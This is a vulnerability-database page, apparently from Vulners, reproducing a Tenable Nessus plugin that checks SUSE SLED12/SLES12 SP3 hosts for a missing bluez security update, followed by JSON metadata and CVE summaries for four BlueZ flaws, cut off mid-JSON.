Search...

SUSE SLED12 / SLES12 Security Update : bluez (SUSE-SU-2018:1778-1) (BlueBorne)

2018-06-22T00:00:00

ID SUSE_SU-2018-1778-1.NASL
Type nessus
Reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified 2021-02-02T00:00:00

Description

This update for bluez fixes the following issues: Security issues fixed :

CVE-2016-9800: Fix hcidump memory leak in pin_code_reply_dump() (bsc#1013721).

CVE-2016-9804: Fix hcidump buffer overflow in commands_dump() (bsc#1013877).

CVE-2016-7837: Fix possible buffer overflow, make sure we don't write past the end of the array (bsc#1026652).

CVE-2017-1000250: Fix information disclosure vulnerability in service_search_attr_req (bsc#1057342).

Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from SUSE update advisory SUSE-SU-2018:1778-1.
# The text itself is copyright (C) SUSE.
#

include("compat.inc");

if (description)
{
  script_id(110661);
  script_version("1.5");
  script_cvs_date("Date: 2019/09/10 13:51:48");

  script_cve_id("CVE-2016-7837", "CVE-2016-9800", "CVE-2016-9804", "CVE-2017-1000250");

  script_name(english:"SUSE SLED12 / SLES12 Security Update : bluez (SUSE-SU-2018:1778-1) (BlueBorne)");
  script_summary(english:"Checks rpm output for the updated packages.");

  script_set_attribute(
    attribute:"synopsis", 
    value:"The remote SUSE host is missing one or more security updates."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"This update for bluez fixes the following issues: Security issues
fixed :

  - CVE-2016-9800: Fix hcidump memory leak in
    pin_code_reply_dump() (bsc#1013721).

  - CVE-2016-9804: Fix hcidump buffer overflow in
    commands_dump() (bsc#1013877).

  - CVE-2016-7837: Fix possible buffer overflow, make sure
    we don't write past the end of the array (bsc#1026652).

  - CVE-2017-1000250: Fix information disclosure
    vulnerability in service_search_attr_req (bsc#1057342).

Note that Tenable Network Security has extracted the preceding
description block directly from the SUSE security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=1013721"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=1013877"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=1026652"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=1057342"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2016-7837/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2016-9800/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2016-9804/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2017-1000250/"
  );
  # https://www.suse.com/support/update/announcement/2018/suse-su-20181778-1/
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?c33bbd46"
  );
  script_set_attribute(
    attribute:"solution", 
    value:
"To install this SUSE Security Update use the SUSE recommended
installation methods like YaST online_update or 'zypper patch'.

Alternatively you can run the command listed for your product :

SUSE Linux Enterprise Workstation Extension 12-SP3:zypper in -t patch
SUSE-SLE-WE-12-SP3-2018-1194=1

SUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t
patch SUSE-SLE-SDK-12-SP3-2018-1194=1

SUSE Linux Enterprise Server 12-SP3:zypper in -t patch
SUSE-SLE-SERVER-12-SP3-2018-1194=1

SUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch
SUSE-SLE-DESKTOP-12-SP3-2018-1194=1"
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:bluez");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:bluez-cups");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:bluez-cups-debuginfo");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:bluez-debuginfo");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:bluez-debugsource");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:libbluetooth3");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:libbluetooth3-debuginfo");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:suse_linux:12");

  script_set_attribute(attribute:"vuln_publication_date", value:"2016/12/03");
  script_set_attribute(attribute:"patch_publication_date", value:"2018/06/21");
  script_set_attribute(attribute:"plugin_publication_date", value:"2018/06/22");
  script_set_attribute(attribute:"in_the_news", value:"true");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"SuSE Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list");

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("rpm.inc");


if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/SuSE/release");
if (isnull(release) || release !~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "SUSE");
os_ver = pregmatch(pattern: "^(SLE(S|D)\d+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "SUSE");
os_ver = os_ver[1];
if (! preg(pattern:"^(SLED12|SLES12)$", string:os_ver)) audit(AUDIT_OS_NOT, "SUSE SLED12 / SLES12", "SUSE " + os_ver);

if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if (cpu !~ "^i[3-6]86$" && "x86_64" &gt;!&lt; cpu && "s390x" &gt;!&lt; cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "SUSE " + os_ver, cpu);

sp = get_kb_item("Host/SuSE/patchlevel");
if (isnull(sp)) sp = "0";
if (os_ver == "SLES12" && (! preg(pattern:"^(3)$", string:sp))) audit(AUDIT_OS_NOT, "SLES12 SP3", os_ver + " SP" + sp);
if (os_ver == "SLED12" && (! preg(pattern:"^(3)$", string:sp))) audit(AUDIT_OS_NOT, "SLED12 SP3", os_ver + " SP" + sp);


flag = 0;
if (rpm_check(release:"SLES12", sp:"3", reference:"bluez-5.13-5.4.1")) flag++;
if (rpm_check(release:"SLES12", sp:"3", reference:"bluez-debuginfo-5.13-5.4.1")) flag++;
if (rpm_check(release:"SLES12", sp:"3", reference:"bluez-debugsource-5.13-5.4.1")) flag++;
if (rpm_check(release:"SLES12", sp:"3", reference:"libbluetooth3-5.13-5.4.1")) flag++;
if (rpm_check(release:"SLES12", sp:"3", reference:"libbluetooth3-debuginfo-5.13-5.4.1")) flag++;
if (rpm_check(release:"SLED12", sp:"3", cpu:"x86_64", reference:"bluez-5.13-5.4.1")) flag++;
if (rpm_check(release:"SLED12", sp:"3", cpu:"x86_64", reference:"bluez-cups-5.13-5.4.1")) flag++;
if (rpm_check(release:"SLED12", sp:"3", cpu:"x86_64", reference:"bluez-cups-debuginfo-5.13-5.4.1")) flag++;
if (rpm_check(release:"SLED12", sp:"3", cpu:"x86_64", reference:"bluez-debuginfo-5.13-5.4.1")) flag++;
if (rpm_check(release:"SLED12", sp:"3", cpu:"x86_64", reference:"bluez-debugsource-5.13-5.4.1")) flag++;
if (rpm_check(release:"SLED12", sp:"3", cpu:"x86_64", reference:"libbluetooth3-5.13-5.4.1")) flag++;
if (rpm_check(release:"SLED12", sp:"3", cpu:"x86_64", reference:"libbluetooth3-debuginfo-5.13-5.4.1")) flag++;


if (flag)
{
  if (report_verbosity &gt; 0) security_warning(port:0, extra:rpm_report_get());
  else security_warning(0);
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "bluez");
}

JSON Vulners Source

Initial Source

{"id": "SUSE_SU-2018-1778-1.NASL", "bulletinFamily": "scanner", "title": "SUSE SLED12 / SLES12 Security Update : bluez (SUSE-SU-2018:1778-1) (BlueBorne)", "description": "This update for bluez fixes the following issues: Security issues\nfixed :\n\n - CVE-2016-9800: Fix hcidump memory leak in\n pin_code_reply_dump() (bsc#1013721).\n\n - CVE-2016-9804: Fix hcidump buffer overflow in\n commands_dump() (bsc#1013877).\n\n - CVE-2016-7837: Fix possible buffer overflow, make sure\n we don't write past the end of the array (bsc#1026652).\n\n - CVE-2017-1000250: Fix information disclosure\n vulnerability in service_search_attr_req (bsc#1057342).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "published": "2018-06-22T00:00:00", "modified": "2021-02-02T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "href": "https://www.tenable.com/plugins/nessus/110661", "reporter": "This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.suse.com/security/cve/CVE-2017-1000250/", "https://bugzilla.suse.com/show_bug.cgi?id=1013721", "https://www.suse.com/security/cve/CVE-2016-9800/", "https://www.suse.com/security/cve/CVE-2016-7837/", "http://www.nessus.org/u?c33bbd46", "https://bugzilla.suse.com/show_bug.cgi?id=1057342", "https://bugzilla.suse.com/show_bug.cgi?id=1026652", "https://bugzilla.suse.com/show_bug.cgi?id=1013877", "https://www.suse.com/security/cve/CVE-2016-9804/"], "cvelist": ["CVE-2016-7837", "CVE-2017-1000250", "CVE-2016-9800", "CVE-2016-9804"], "type": "nessus", "lastseen": "2021-02-01T06:46:21", "edition": 26, "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-1000250", "CVE-2016-7837", "CVE-2016-9804", "CVE-2016-9800"]}, {"type": "nessus", "idList": ["FEDORA_2017-FE95A5B88B.NASL", "CENTOS_RHSA-2017-2685.NASL", "ORACLELINUX_ELSA-2017-2685.NASL", "SUSE_SU-2019-0510-1.NASL", "DEBIAN_DSA-3972.NASL", "NEWSTART_CGSL_NS-SA-2019-0117_BLUEZ.NASL", "SLACKWARE_SSA_2017-258-01.NASL", "EULEROS_SA-2019-1378.NASL", "VIRTUOZZO_VZLSA-2017-2685.NASL", "OPENSUSE-2017-1176.NASL"]}, {"type": "redhat", "idList": ["RHSA-2017:2685"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1103-1:B4D85", "DEBIAN:DSA-3972-1:ACF5D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310882765", "OPENVAS:1361412562310882767", "OPENVAS:1361412562311220191378", "OPENVAS:1361412562310843301", "OPENVAS:1361412562310891103", "OPENVAS:1361412562311220192380", "OPENVAS:1361412562310811768", "OPENVAS:1361412562311220192559", "OPENVAS:1361412562310703972", "OPENVAS:1361412562310873368"]}, {"type": "centos", "idList": ["CESA-2017:2685"]}, {"type": "archlinux", "idList": ["ASA-201709-3"]}, {"type": "slackware", "idList": ["SSA-2017-258-01"]}, {"type": "oraclelinux", "idList": ["ELSA-2017-2685"]}, {"type": "fedora", "idList": ["FEDORA:2F41461DF302", "FEDORA:211166075B57"]}, {"type": "ubuntu", "idList": ["USN-4311-1", "USN-3413-1"]}, {"type": "jvn", "idList": ["JVN:38755305"]}, {"type": "thn", "idList": ["THN:649BE2C710B04C213ECB85D95D5F229A", "THN:4141386ABD9B9D1290E4A6EAD271B02B"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:4259-1"]}, {"type": "myhack58", "idList": ["MYHACK58:62201789258", "MYHACK58:62201789526"]}, {"type": "threatpost", "idList": ["THREATPOST:73E805ED92B364393EDD601647FE122D"]}, {"type": "seebug", "idList": ["SSV:96467"]}, {"type": "cert", "idList": ["VU:240311"]}, {"type": "lenovo", "idList": ["LENOVO:PS500141-NOSID"]}, {"type": "pentestit", "idList": ["PENTESTIT:4BD75D96F8359A3C04C87CDD1210FFCF"]}, {"type": "nvidia", "idList": ["NVIDIA:4561"]}], "modified": "2021-02-01T06:46:21", "rev": 2}, "score": {"value": 8.0, "vector": "NONE", "modified": "2021-02-01T06:46:21", "rev": 2}, "vulnersScore": 8.0}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1778-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110661);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/09/10 13:51:48\");\n\n script_cve_id(\"CVE-2016-7837\", \"CVE-2016-9800\", \"CVE-2016-9804\", \"CVE-2017-1000250\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : bluez (SUSE-SU-2018:1778-1) (BlueBorne)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for bluez fixes the following issues: Security issues\nfixed :\n\n - CVE-2016-9800: Fix hcidump memory leak in\n pin_code_reply_dump() (bsc#1013721).\n\n - CVE-2016-9804: Fix hcidump buffer overflow in\n commands_dump() (bsc#1013877).\n\n - CVE-2016-7837: Fix possible buffer overflow, make sure\n we don't write past the end of the array (bsc#1026652).\n\n - CVE-2017-1000250: Fix information disclosure\n vulnerability in service_search_attr_req (bsc#1057342).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1013721\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1013877\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1026652\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1057342\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7837/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-9800/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-9804/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000250/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181778-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c33bbd46\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP3:zypper in -t patch\nSUSE-SLE-WE-12-SP3-2018-1194=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2018-1194=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2018-1194=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2018-1194=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bluez\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bluez-cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bluez-cups-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bluez-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bluez-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libbluetooth3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libbluetooth3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/22\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"bluez-5.13-5.4.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"bluez-debuginfo-5.13-5.4.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"bluez-debugsource-5.13-5.4.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libbluetooth3-5.13-5.4.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libbluetooth3-debuginfo-5.13-5.4.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"bluez-5.13-5.4.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"bluez-cups-5.13-5.4.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"bluez-cups-debuginfo-5.13-5.4.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"bluez-debuginfo-5.13-5.4.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"bluez-debugsource-5.13-5.4.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libbluetooth3-5.13-5.4.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libbluetooth3-debuginfo-5.13-5.4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bluez\");\n}\n", "naslFamily": "SuSE Local Security Checks", "pluginID": "110661", "cpe": ["p-cpe:/a:novell:suse_linux:libbluetooth3-debuginfo", "p-cpe:/a:novell:suse_linux:bluez", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:bluez-cups", "p-cpe:/a:novell:suse_linux:bluez-debuginfo", "p-cpe:/a:novell:suse_linux:libbluetooth3", "p-cpe:/a:novell:suse_linux:bluez-cups-debuginfo", "p-cpe:/a:novell:suse_linux:bluez-debugsource"], "scheme": null, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}}

{"cve": [{"lastseen": "2021-02-02T06:36:31", "description": "All versions of the SDP server in BlueZ 5.46 and earlier are vulnerable to an information disclosure vulnerability which allows remote attackers to obtain sensitive information from the bluetoothd process memory. This vulnerability lies in the processing of SDP search attribute requests.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-09-12T17:29:00", "title": "CVE-2017-1000250", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.3, "vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000250"], "modified": "2018-02-17T02:29:00", "cpe": ["cpe:/a:bluez:bluez:5.46"], "id": "CVE-2017-1000250", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000250", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:bluez:bluez:5.46:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:14", "description": "In BlueZ 5.42, a buffer overflow was observed in \"commands_dump\" function in \"tools/parser/csr.c\" source file. The issue exists because \"commands\" array is overflowed by supplied parameter due to lack of boundary checks on size of the buffer from frame \"frm->ptr\" parameter. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2016-12-03T06:59:00", "title": "CVE-2016-9804", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9804"], "modified": "2016-12-07T19:29:00", "cpe": ["cpe:/a:bluez:bluez:5.42"], "id": "CVE-2016-9804", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9804", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:bluez:bluez:5.42:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:11", "description": "Buffer overflow in BlueZ 5.41 and earlier allows an attacker to execute arbitrary code via the parse_line function used in some userland utilities.", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-09T16:29:00", "title": "CVE-2016-7837", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7837"], "modified": "2020-04-03T00:15:00", "cpe": ["cpe:/a:bluez:bluez:5.41"], "id": "CVE-2016-7837", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7837", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:bluez:bluez:5.41:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:14", "description": "In BlueZ 5.42, a buffer overflow was observed in \"pin_code_reply_dump\" function in \"tools/parser/hci.c\" source file. The issue exists because \"pin\" array is overflowed by supplied parameter due to lack of boundary checks on size of the buffer from frame \"pin_code_reply_cp *cp\" parameter.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2016-12-03T06:59:00", "title": "CVE-2016-9800", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": 